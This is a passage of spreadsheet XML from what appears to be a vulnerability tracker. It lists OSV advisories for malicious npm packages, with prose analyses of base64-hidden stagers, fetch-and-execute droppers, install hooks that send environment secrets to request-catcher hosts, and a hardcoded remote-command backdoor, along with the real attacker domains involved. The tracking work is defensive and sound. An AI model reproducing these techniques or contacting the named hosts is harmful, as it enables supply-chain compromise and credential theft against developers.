- https://github.com/strukturag/libheif/security/advisories/GHSA-2jg2-4ch7-h545</t></is></c><c r="T1669" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="1670"><c r="A1670" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1670" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D1670" s="5" t="inlineStr" /><c r="E1670" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1670" s="5" t="inlineStr" /><c r="H1670" s="5" t="inlineStr" /><c r="I1670" s="5" t="inlineStr" /><c r="J1670" s="5" t="inlineStr" /><c r="K1670" s="5" t="inlineStr" /><c r="L1670" s="5" t="inlineStr"><is><t>NuGet:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M1670" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N1670" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1670" s="5" t="inlineStr" /><c r="R1670" s="5" t="inlineStr" /><c r="S1670" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1670" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="1671"><c r="A1671" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1671" s="5" t="inlineStr"><is><t>MAL-2026-16048</t></is></c><c r="D1671" s="5" t="inlineStr" /><c r="E1671" s="5" t="inlineStr" /><c r="F1671" s="5" t="inlineStr" /><c r="G1671" s="5" t="inlineStr" /><c r="H1671" s="5" t="inlineStr" /><c r="I1671" s="5" t="inlineStr" /><c r="J1671" s="5" t="inlineStr" /><c r="K1671" s="5" t="inlineStr" /><c r="L1671" s="5" t="inlineStr"><is><t>npm:punypump</t></is></c><c r="M1671" s="5" t="inlineStr" /><c r="N1671" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1671" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1671" s="5" t="inlineStr" /><c r="R1671" s="5" t="inlineStr" /><c r="S1671" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e56cc14096d20f679823bf15af9f44dff039e01f23d2082eba8020200d04a7f)
The package presents itself as a console shim (index.js is a verbatim copy of console-browserify with description 'Emulate console for all the browsers'), but also ships library.js and test/sessionCtrl.js which auto-execute a stager on module load via initializeService().catch(...). The stager fetches an opaque blob from a base64-hidden URL (config.API_GATEWAY = 'aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9WNk5CWA==' decoding to https://www.jsonkeeper.com/b/V6NBX), AES-256-CBC decrypts it with a hardcoded key, and passes the plaintext to eval(). The endpoint URL, HTTP header name, and header value are all base64-encoded in config.js. Content served from the jsonkeeper.com paste is mutable and attacker-controlled, so require('punypump/library') runs arbitrary attacker code on the installer's machine.
</t></is></c><c r="T1671" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="1672"><c r="A1672" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1672" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D1672" s="5" t="inlineStr" /><c r="E1672" s="5" t="inlineStr" /><c r="F1672" s="5" t="inlineStr" /><c r="G1672" s="5" t="inlineStr" /><c r="H1672" s="5" t="inlineStr" /><c r="I1672" s="5" t="inlineStr" /><c r="J1672" s="5" t="inlineStr" /><c r="K1672" s="5" t="inlineStr" /><c r="L1672" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M1672" s="5" t="inlineStr" /><c r="N1672" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1672" s="5" t="inlineStr" /><c r="R1672" s="5" t="inlineStr" /><c r="S1672" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="T1672" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="1673"><c r="A1673" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1673" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D1673" s="5" t="inlineStr" /><c r="E1673" s="5" t="inlineStr" /><c r="F1673" s="5" t="inlineStr" /><c r="G1673" s="5" t="inlineStr" /><c r="H1673" s="5" t="inlineStr" /><c r="I1673" s="5" t="inlineStr" /><c r="J1673" s="5" t="inlineStr" /><c r="K1673" s="5" t="inlineStr" /><c r="L1673" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M1673" s="5" t="inlineStr" /><c r="N1673" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1673" s="5" t="inlineStr" /><c r="R1673" s="5" t="inlineStr" /><c r="S1673" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
</t></is></c><c r="T1673" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="1674"><c r="A1674" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1674" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D1674" s="5" t="inlineStr" /><c r="E1674" s="5" t="inlineStr" /><c r="F1674" s="5" t="inlineStr" /><c r="G1674" s="5" t="inlineStr" /><c r="H1674" s="5" t="inlineStr" /><c r="I1674" s="5" t="inlineStr" /><c r="J1674" s="5" t="inlineStr" /><c r="K1674" s="5" t="inlineStr" /><c r="L1674" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M1674" s="5" t="inlineStr" /><c r="N1674" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1674" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1674" s="5" t="inlineStr" /><c r="R1674" s="5" t="inlineStr" /><c r="S1674" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="T1674" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="1675"><c r="A1675" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1675" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D1675" s="5" t="inlineStr" /><c r="E1675" s="5" t="inlineStr" /><c r="F1675" s="5" t="inlineStr" /><c r="G1675" s="5" t="inlineStr" /><c r="H1675" s="5" t="inlineStr" /><c r="I1675" s="5" t="inlineStr" /><c r="J1675" s="5" t="inlineStr" /><c r="K1675" s="5" t="inlineStr" /><c r="L1675" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M1675" s="5" t="inlineStr" /><c r="N1675" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1675" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1675" s="5" t="inlineStr" /><c r="R1675" s="5" t="inlineStr" /><c r="S1675" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="T1675" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="1676"><c r="A1676" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1676" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D1676" s="5" t="inlineStr" /><c r="E1676" s="5" t="inlineStr" /><c r="F1676" s="5" t="inlineStr" /><c r="G1676" s="5" t="inlineStr" /><c r="H1676" s="5" t="inlineStr" /><c r="I1676" s="5" t="inlineStr" /><c r="J1676" s="5" t="inlineStr" /><c r="K1676" s="5" t="inlineStr" /><c r="L1676" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M1676" s="5" t="inlineStr" /><c r="N1676" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1676" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1676" s="5" t="inlineStr" /><c r="R1676" s="5" t="inlineStr" /><c r="S1676" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="T1676" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="1677"><c r="A1677" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1677" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D1677" s="5" t="inlineStr" /><c r="E1677" s="5" t="inlineStr" /><c r="F1677" s="5" t="inlineStr" /><c r="G1677" s="5" t="inlineStr" /><c r="H1677" s="5" t="inlineStr" /><c r="I1677" s="5" t="inlineStr" /><c r="J1677" s="5" t="inlineStr" /><c r="K1677" s="5" t="inlineStr" /><c r="L1677" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M1677" s="5" t="inlineStr" /><c r="N1677" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1677" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1677" s="5" t="inlineStr" /><c r="R1677" s="5" t="inlineStr" /><c r="S1677" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="T1677" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="1678"><c r="A1678" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1678" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D1678" s="5" t="inlineStr" /><c r="E1678" s="5" t="inlineStr" /><c r="F1678" s="5" t="inlineStr" /><c r="G1678" s="5" t="inlineStr" /><c r="H1678" s="5" t="inlineStr" /><c r="I1678" s="5" t="inlineStr" /><c r="J1678" s="5" t="inlineStr" /><c r="K1678" s="5" t="inlineStr" /><c r="L1678" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M1678" s="5" t="inlineStr" /><c r="N1678" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1678" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1678" s="5" t="inlineStr" /><c r="R1678" s="5" t="inlineStr" /><c r="S1678" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="T1678" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="1679"><c r="A1679" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1679" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D1679" s="5" t="inlineStr" /><c r="E1679" s="5" t="inlineStr" /><c r="F1679" s="5" t="inlineStr" /><c r="G1679" s="5" t="inlineStr" /><c r="H1679" s="5" t="inlineStr" /><c r="I1679" s="5" t="inlineStr" /><c r="J1679" s="5" t="inlineStr" /><c r="K1679" s="5" t="inlineStr" /><c r="L1679" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M1679" s="5" t="inlineStr" /><c r="N1679" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1679" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1679" s="5" t="inlineStr" /><c r="R1679" s="5" t="inlineStr" /><c r="S1679" s="5" t="inlineStr"><is><t>plogme is a renamed fork of the Baileys WhatsApp Web library from the same publisher-controlled family as @crysnovax/baileys (MAL-2026-15917), and versions 1.0.0 through 1.0.3 carry the same forced-follow and fingerprint modules. lib/Utils/channel-policy.js (javascript-obfuscator output, identical to the file in MAL-2026-15917) hardcodes the publisher's WhatsApp newsletter channels 120363423670814885@newsletter and 120363402922206865@newsletter and exports followCrysnovaxTrustedChannels(); lib/Socket/socket.js invokes it from the connection.update handler, so the user's own authenticated WhatsApp account silently follows both channels on every successful connection, with no opt-out. lib/Utils/integrity.js hashes hostname, platform, arch, cpu model and Node version into a machine fingerprint and POSTs it with the package identity to https://bailey.crysnovax.link/api/v1/verify on every socket connect. The obfuscated follow module was decoded, not executed.</t></is></c><c r="T1679" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row></sheetData><autoFilter ref="A1:T1679" /><conditionalFormatting sqref="E2:E1679"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G1679"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T954" r:id="rId953" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T955" r:id="rId954" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T956" r:id="rId955" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T957" r:id="rId956" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T958" r:id="rId957" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T959" r:id="rId958" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T960" r:id="rId959" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T961" r:id="rId960" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T962" r:id="rId961" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T963" r:id="rId962" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T964" r:id="rId963" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T965" r:id="rId964" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T966" r:id="rId965" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T967" r:id="rId966" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T968" r:id="rId967" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T969" r:id="rId968" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T970" r:id="rId969" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T971" r:id="rId970" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T972" r:id="rId971" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T973" r:id="rId972" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T974" r:id="rId973" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T975" r:id="rId974" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T976" r:id="rId975" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T977" r:id="rId976" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T978" r:id="rId977" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T979" r:id="rId978" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T980" r:id="rId979" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T981" r:id="rId980" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T982" r:id="rId981" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T983" r:id="rId982" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T984" r:id="rId983" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T985" r:id="rId984" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T986" r:id="rId985" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T987" r:id="rId986" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T988" r:id="rId987" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T989" r:id="rId988" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T990" r:id="rId989" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T991" r:id="rId990" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T992" r:id="rId991" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T993" r:id="rId992" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T994" r:id="rId993" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T995" r:id="rId994" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T996" r:id="rId995" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T997" r:id="rId996" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T998" r:id="rId997" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T999" r:id="rId998" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1000" r:id="rId999" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1001" r:id="rId1000" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1002" r:id="rId1001" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1003" r:id="rId1002" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1004" r:id="rId1003" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1005" r:id="rId1004" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1006" r:id="rId1005" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1007" r:id="rId1006" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1008" r:id="rId1007" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1009" r:id="rId1008" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1010" r:id="rId1009" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1011" r:id="rId1010" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1012" r:id="rId1011" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1013" r:id="rId1012" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1014" r:id="rId1013" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1015" r:id="rId1014" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1016" r:id="rId1015" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1017" r:id="rId1016" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1018" r:id="rId1017" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1019" r:id="rId1018" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1020" r:id="rId1019" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1021" r:id="rId1020" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1022" r:id="rId1021" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1023" r:id="rId1022" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1024" r:id="rId1023" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1025" r:id="rId1024" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1026" r:id="rId1025" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1027" r:id="rId1026" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1028" r:id="rId1027" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1029" r:id="rId1028" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1030" r:id="rId1029" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1031" r:id="rId1030" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1032" r:id="rId1031" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1033" r:id="rId1032" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1034" r:id="rId1033" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1035" r:id="rId1034" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1036" r:id="rId1035" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1037" r:id="rId1036" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1038" r:id="rId1037" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1039" r:id="rId1038" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1040" r:id="rId1039" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1041" r:id="rId1040" /><hyperlink 